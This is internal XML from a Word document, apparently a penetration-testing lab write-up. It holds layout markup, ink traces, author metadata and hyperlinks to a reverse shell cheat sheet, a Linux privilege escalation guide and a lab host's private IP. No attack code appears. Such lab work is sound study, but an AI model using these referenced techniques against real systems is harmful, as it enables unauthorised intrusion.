              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="93710104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535324">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="667489446">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="848250415">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="56159555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737657">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1797986087">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="595023317">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="79567937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948469">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1433207788">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="614410879">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="904728548">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="19595292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mailto:alice@10.10.217.200" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://askubuntu.com/questions/836048/ssh-returns-no-matching-host-key-type-found-their-offer-ssh-dss" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/"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ustomXml" Target="ink/ink1.xml"/><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entestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink2.xml"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.boxentriq.co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6T15:33:47.838"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05" units="cm"/>
      <inkml:brushProperty name="height" value="0.05" units="cm"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 5 24575,'0'-4'0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6T15:31:52.837"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05" units="cm"/>
      <inkml:brushProperty name="height" value="0.05" units="cm"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">811 2046 24575,'0'-452'0,"1"435"0,1-1 0,0 0 0,6-18 0,5-45 0,8-147 0,24 4 0,-42 212 0,16-68 0,0-8 0,3 1 0,46-110 0,-27 121 0,-27 52 0,18-40 0,-7 7 0,2 2 0,2 1 0,41-56 0,-59 94 0,-9 11 0,1 0 0,0 0 0,0 0 0,0 0 0,1 1 0,-1-1 0,1 1 0,0 0 0,8-5 0,-12 9 0,1 0 0,0 0 0,-1 0 0,1 0 0,-1 1 0,1-1 0,0 0 0,-1 0 0,1 1 0,-1-1 0,1 0 0,-1 1 0,1-1 0,-1 0 0,1 1 0,-1-1 0,1 1 0,-1-1 0,1 1 0,-1-1 0,0 1 0,1-1 0,-1 1 0,0-1 0,0 1 0,1-1 0,-1 1 0,0 0 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0-1 0,-1 1 0,1 0 0,-6 32 0,-58 151 0,31-95 0,16-43 0,1-2 0,1-1 0,-17 88 0,21-72 0,7-37 0,0 1 0,-2 31 0,5-37 0,-2-1 0,-6 27 0,4-23 0,0-1 0,-1 32 0,5-46 0,1-1 0,0 1 0,1-1 0,-1 1 0,1-1 0,0 1 0,0-1 0,0 1 0,0-1 0,1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,1 0 0,3 4 0,-2-4 0,1-1 0,0 0 0,0 0 0,0-1 0,0 1 0,0-1 0,0 0 0,1 0 0,-1-1 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1-1 0,6 0 0,88-7 0,-100 7 0,39-7 0,0-2 0,43-16 0,-29 9 0,36-18 0,-65 23 0,1 2 0,51-14 0,80-4 0,-127 22 0,0-3 0,31-11 0,-1 1 0,-134 31 0,-181 32 0,186-35 0,-45 1 0,-25 4 0,131-13-6,-57 11-48,0-3 0,-71 2 0,-12 4-893,67-6 676,38-3 271,-80 23 0,-18 4 0,31-12 592,-120 42 0,124-32-390,-42 16-202,272-23 0,-75-21 0,-17-3 0,61 13 0,20 2 0,-24-5 0,-42-3 0,8 3 0,0-3 0,84 2 0,59 3 0,3 0 0,-158-12 0,62 12 0,-61-7 0,59 1 0,-51-4 0,0 1 0,67 16 0,33 3 0,-101-21 39,-37-2-390,1 0 0,0 1 0,21 4 0,-18 0-6475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AE982-BDCE-46C3-8C5F-2CD4693C0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9</Pages>
  <Words>1230</Words>
  <Characters>7013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Ji-Jian Chin-Personal</dc:creator>
  <cp:lastModifiedBy>ISAIAH WONG TERJIE</cp:lastModifiedBy>
  <cp:revision>10</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-07-24T20:10:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-07-27T09:50:00Z</dcterms:modified>
</cp:coreProperties>
</file>